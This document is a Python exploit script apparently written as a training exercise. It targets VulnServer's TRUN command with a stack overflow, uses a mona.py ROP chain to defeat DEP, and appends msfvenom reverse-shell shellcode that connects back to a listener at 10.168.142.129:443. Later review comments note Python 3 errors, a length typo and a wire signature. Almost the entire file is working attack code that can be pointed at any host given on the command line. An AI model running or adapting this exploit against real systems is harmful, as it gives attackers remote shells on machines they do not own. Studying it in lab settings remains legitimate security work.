#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/04/25 21:03:15 dhn Exp $

import socket
import struct
import argparse

class Exploit:
    """Minimal TCP client that delivers one ``TRUN`` command to the target.

    The class only knows how to open a socket, write the prepared payload
    after the ``TRUN .`` verb and read one response; building the payload
    itself is left to the caller (see ``main``).

    NOTE(review): the file is written for Python 2 string semantics (``str``
    is a byte string). On Python 3 ``socket.send`` requires ``bytes``, so the
    concatenation in ``run`` would raise ``TypeError`` there.
    """

    def __init__(self, server, port, payload):
        # server: host name or IPv4 address (AF_INET socket below)
        # port:   integer TCP port
        # payload: byte string appended verbatim after "TRUN ."
        self._payload = payload
        self._server = server
        self._port = port

    def __connect(self):
        """Open and return a connected IPv4 TCP socket to the target.

        Name-mangled (``_Exploit__connect``); no timeout is set, so
        ``connect()`` and the later ``recv()`` block indefinitely if the
        target does not answer. Raises ``socket.error`` on failure.
        """
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self._server, self._port))
        return s


    def run(self):
        """Send the payload once and read at most 1024 bytes back.

        Returns 1 when any ``socket.error`` is raised, otherwise ``None``;
        ``main`` treats a truthy return as failure. Nothing in the response
        is inspected, so "success" here only means the bytes were handed to
        the socket without error.
        """
        try:
            s = self.__connect()
            print("[+] Sending payload...")
            # send() may transmit fewer bytes than requested; its return
            # value is not checked.
            s.send("TRUN ." + self._payload + "\r\n")
            s.recv(1024)
            s.close()
        except socket.error:
            # No finally/with: if the error happens after __connect the
            # socket is not closed explicitly.
            print("[!] Socket error...")
            return 1


def create_rop_chain():
    """Return the ROP chain as a packed byte string (20 x 4 = 80 bytes).

    Every entry is encoded as a little-endian unsigned 32-bit value
    (``'<I'``). The values are absolute addresses (module named in each
    inline comment), so the chain is only meaningful for the exact DLL
    builds and load addresses it was generated against; any other
    environment will not match these addresses.

    NOTE(review): ``''.join`` over ``struct.pack`` output relies on Python 2
    ``str``; on Python 3 ``struct.pack`` returns ``bytes`` and the join
    raises ``TypeError``.
    """
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x76755603,  # POP ECX # RETN [RPCRT4.dll]
        0x6250609c,  # ptr to &VirtualProtect() [IAT essfunc.dll]
        0x7663fd52,  # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll]
        0x77717dee,  # POP EBP # RETN [ntdll.dll]
        0x625011bb,  # & jmp esp [essfunc.dll]
        0x76163d03,  # POP EAX # RETN [msvcrt.dll]
        0xfffffdff,  # Value to negate, will become 0x00000201
        0x76622fd0,  # NEG EAX # RETN [MSCTF.dll]
        0x7663f9f1,  # XCHG EAX,EBX # RETN [MSCTF.dll]
        0x76101cf2,  # POP EAX # RETN [msvcrt.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x7677dae9,  # NEG EAX # RETN [RPCRT4.dll]
        0x77736d70,  # XCHG EAX,EDX # RETN [ntdll.dll]
        0x7670c705,  # POP ECX # RETN [RPCRT4.dll]
        0x760a3630,  # &Writable location [NSI.dll]
        0x7675778c,  # POP EDI # RETN [RPCRT4.dll]
        0x76711645,  # RETN (ROP NOP) [RPCRT4.dll]
        0x7610a837,  # POP EAX # RETN [msvcrt.dll]
        0x90909090,  # nop
        0x777227c4,  # PUSHAD # RETN [ntdll.dll]
    ]
    # Pack each gadget address as a 4-byte little-endian value.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

def main(args):
    """Assemble the TRUN payload and deliver it to ``args.host:args.port``.

    args: argparse namespace with ``host`` (str) and ``port`` (str, converted
    to int here). Prints a status line and "[+] Done" or "[!] Fail" based on
    ``Exploit.run``; returns ``None``.
    """
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.168.142.129 LPORT=443 \
    #        -f py -v shell -o shell -b '\x00' EXITFUNC=thread
    # Encoded stage-2 blob from the command above; the connect-back address
    # and port are fixed inside it (see LHOST/LPORT), so it must be
    # regenerated for any other listener. 27 lines x 13 bytes = 351 bytes.
    shellcode = (
        "\xda\xc8\xb8\x2a\x06\xb7\x1b\xd9\x74\x24\xf4\x5b\x33"
        "\xc9\xb1\x52\x83\xc3\x04\x31\x43\x13\x03\x69\x15\x55"
        "\xee\x91\xf1\x1b\x11\x69\x02\x7c\x9b\x8c\x33\xbc\xff"
        "\xc5\x64\x0c\x8b\x8b\x88\xe7\xd9\x3f\x1a\x85\xf5\x30"
        "\xab\x20\x20\x7f\x2c\x18\x10\x1e\xae\x63\x45\xc0\x8f"
        "\xab\x98\x01\xd7\xd6\x51\x53\x80\x9d\xc4\x43\xa5\xe8"
        "\xd4\xe8\xf5\xfd\x5c\x0d\x4d\xff\x4d\x80\xc5\xa6\x4d"
        "\x23\x09\xd3\xc7\x3b\x4e\xde\x9e\xb0\xa4\x94\x20\x10"
        "\xf5\x55\x8e\x5d\x39\xa4\xce\x9a\xfe\x57\xa5\xd2\xfc"
        "\xea\xbe\x21\x7e\x31\x4a\xb1\xd8\xb2\xec\x1d\xd8\x17"
        "\x6a\xd6\xd6\xdc\xf8\xb0\xfa\xe3\x2d\xcb\x07\x6f\xd0"
        "\x1b\x8e\x2b\xf7\xbf\xca\xe8\x96\xe6\xb6\x5f\xa6\xf8"
        "\x18\x3f\x02\x73\xb4\x54\x3f\xde\xd1\x99\x72\xe0\x21"
        "\xb6\x05\x93\x13\x19\xbe\x3b\x18\xd2\x18\xbc\x5f\xc9"
        "\xdd\x52\x9e\xf2\x1d\x7b\x65\xa6\x4d\x13\x4c\xc7\x05"
        "\xe3\x71\x12\x89\xb3\xdd\xcd\x6a\x63\x9e\xbd\x02\x69"
        "\x11\xe1\x33\x92\xfb\x8a\xde\x69\x6c\xbf\xb6\xff\xed"
        "\xd7\xc4\xff\xec\x9c\x40\x19\x84\xf2\x04\xb2\x31\x6a"
        "\x0d\x48\xa3\x73\x9b\x35\xe3\xf8\x28\xca\xaa\x08\x44"
        "\xd8\x5b\xf9\x13\x82\xca\x06\x8e\xaa\x91\x95\x55\x2a"
        "\xdf\x85\xc1\x7d\x88\x78\x18\xeb\x24\x22\xb2\x09\xb5"
        "\xb2\xfd\x89\x62\x07\x03\x10\xe6\x33\x27\x02\x3e\xbb"
        "\x63\x76\xee\xea\x3d\x20\x48\x45\x8c\x9a\x02\x3a\x46"
        "\x4a\xd2\x70\x59\x0c\xdb\x5c\x2f\xf0\x6a\x09\x76\x0f"
        "\x42\xdd\x7e\x68\xbe\x7d\x80\xa3\x7a\x9d\x63\x61\x77"
        "\x36\x3a\xe0\x3a\x5b\xbd\xdf\x79\x62\x3e\xd5\x01\x91"
        "\x5e\x9c\x04\xdd\xd8\x4d\x75\x4e\x8d\x71\x2a\x6f\x84"
    )

    # stage 1: make the stack executable
    rop_chain = create_rop_chain()

    # Payload layout: 2006 bytes of filler, 80-byte ROP chain, 4 NOP bytes,
    # then the 351-byte shellcode. That sums to 2441 bytes by my count; the
    # original comment said 2241, which looks like a typo.
    # Detection note: on the wire this is a "TRUN ." command followed by a
    # very long run of 0x41 bytes, far beyond any legitimate argument length.
    payload = "A" * 2006 + rop_chain + "\x90" * 4 + shellcode

    # fire and forget!
    exploit = Exploit(args.host, int(args.port), payload)
    print("[+] VulnServer TRUN; DEP bypass exploit by dhn")
    print("[+] Exploiting %s:%s" % (args.host, args.port))

    # run() returns 1 only on socket.error; None (falsy) otherwise.
    if exploit.run():
        print("[!] Fail")
    else:
        print("[+] Done")


if __name__ == "__main__":
    # Command-line entry: both options are mandatory. --port is parsed as a
    # plain string here and converted with int() inside main(), so a
    # non-numeric value fails there with ValueError rather than at parse time.
    parser = argparse.ArgumentParser()
    parser.add_argument('--host', required=True)
    parser.add_argument('--port', required=True)
    args = parser.parse_args()

    main(args)
